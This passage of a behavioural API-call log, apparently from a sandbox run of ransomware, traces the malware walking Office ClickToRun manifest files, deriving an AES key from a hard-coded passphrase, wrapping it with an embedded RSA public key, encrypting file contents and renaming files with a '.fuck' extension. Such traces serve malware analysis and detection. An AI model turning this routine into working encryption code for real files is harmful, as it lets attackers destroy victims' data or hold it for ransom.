Algorithm.Parameters.pbData=0x27f63c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f63d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb360) returned 1 [0235.947] CryptEncrypt (in: hKey=0x27eb360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.947] CryptEncrypt (in: hKey=0x27eb360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9900*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9900*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.947] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9900, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.947] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27fe850, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.947] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.947] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.947] CloseHandle (hObject=0xffffffff) returned 1 [0235.947] CloseHandle (hObject=0xffffffff) returned 1 [0235.947] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.948] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.949] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.gsg")) returned 0 [0235.949] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.fuck")) returned 0 [0235.949] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.949] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0235.949] CryptReleaseContext (hProv=0x27e97f0, dwFlags=0x0) returned 1 [0235.949] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.949] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.950] GetLastError () returned 0x5 [0235.950] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml")) returned 0x20 [0235.950] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.950] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.950] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.951] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.951] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e9548) returned 1 [0235.960] CryptCreateHash (in: hProv=0x27e9548, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.960] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.960] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.960] CryptDeriveKey (in: hProv=0x27e9548, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0235.960] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.960] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.960] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e97f0) returned 1 [0235.963] CryptImportPublicKeyInfo (in: hCryptProv=0x27e97f0, dwCertEncodingType=0x1, pInfo=0x27f7168*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7198*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f71a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb060) returned 1 [0235.963] CryptEncrypt (in: hKey=0x27eb060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.963] CryptEncrypt (in: hKey=0x27eb060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8ee8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e8ee8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.964] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8ee8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.964] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.964] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.964] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.964] CloseHandle (hObject=0xffffffff) returned 1 [0235.965] CloseHandle (hObject=0xffffffff) returned 1 [0235.965] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0235.965] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.965] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.gsg")) returned 0 [0235.966] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.fuck")) returned 0 [0235.966] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.966] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0235.966] CryptReleaseContext (hProv=0x27e9548, dwFlags=0x0) returned 1 [0235.966] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.966] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.966] GetLastError () returned 0x5 [0235.966] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml")) returned 0x20 [0235.967] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.967] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.968] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.968] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.968] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2793100) returned 1 [0235.977] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.977] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.977] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.977] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0235.977] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.978] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.978] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2781330) returned 1 [0235.980] CryptImportPublicKeyInfo (in: hCryptProv=0x2781330, dwCertEncodingType=0x1, pInfo=0x27f6c88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6cb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6cc0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb420) returned 1 [0235.980] CryptEncrypt (in: hKey=0x27eb420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.980] CryptEncrypt (in: hKey=0x27eb420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fe908*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fe908*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.981] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fe908, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.981] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.981] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.981] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.981] CloseHandle (hObject=0xffffffff) returned 1 [0235.981] CloseHandle (hObject=0xffffffff) returned 1 [0235.981] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.981] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.982] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.gsg")) returned 0 [0235.982] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml.fuck")) returned 0 [0235.982] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.982] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0235.982] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0235.982] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.982] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.983] GetLastError () returned 0x5 [0235.983] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml")) returned 0x20 [0235.983] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.984] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.984] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.984] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.984] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff8f8) returned 1 [0235.994] CryptCreateHash (in: hProv=0x27ff8f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.994] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.994] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.994] CryptDeriveKey (in: hProv=0x27ff8f8, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0235.994] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.994] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.994] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff430) returned 1 [0235.997] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff430, dwCertEncodingType=0x1, pInfo=0x27f7718*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7748*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7750*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb7e0) returned 1 [0235.997] CryptEncrypt (in: hKey=0x27eb7e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.997] CryptEncrypt (in: hKey=0x27eb7e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fe880*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fe880*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.997] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fe880, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.997] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2802860, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.997] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.997] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.997] CloseHandle (hObject=0xffffffff) returned 1 [0235.997] CloseHandle (hObject=0xffffffff) returned 1 [0235.997] CopyFileA 